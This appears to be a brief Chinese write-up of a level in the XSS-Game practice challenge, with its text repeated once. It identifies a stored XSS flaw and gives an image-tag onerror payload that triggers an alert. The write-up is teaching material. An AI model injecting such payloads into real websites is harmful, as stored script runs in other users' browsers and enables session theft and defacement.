水题,明显是存储型 XSS 。
提交 <img src=0 />发现页面直接解析了
直接构造 payload 即可:
<img src=0 onerror=alert("exp") />

答案下载
- payload.html : 下载
水题,明显是存储型 XSS 。
提交 <img src=0 />发现页面直接解析了
直接构造 payload 即可:
<img src=0 onerror=alert("exp") />

【XSS-Game】 Level 3 - That sinking feeling...
【XSS-Game】 Level 1 - Hello, world of XSS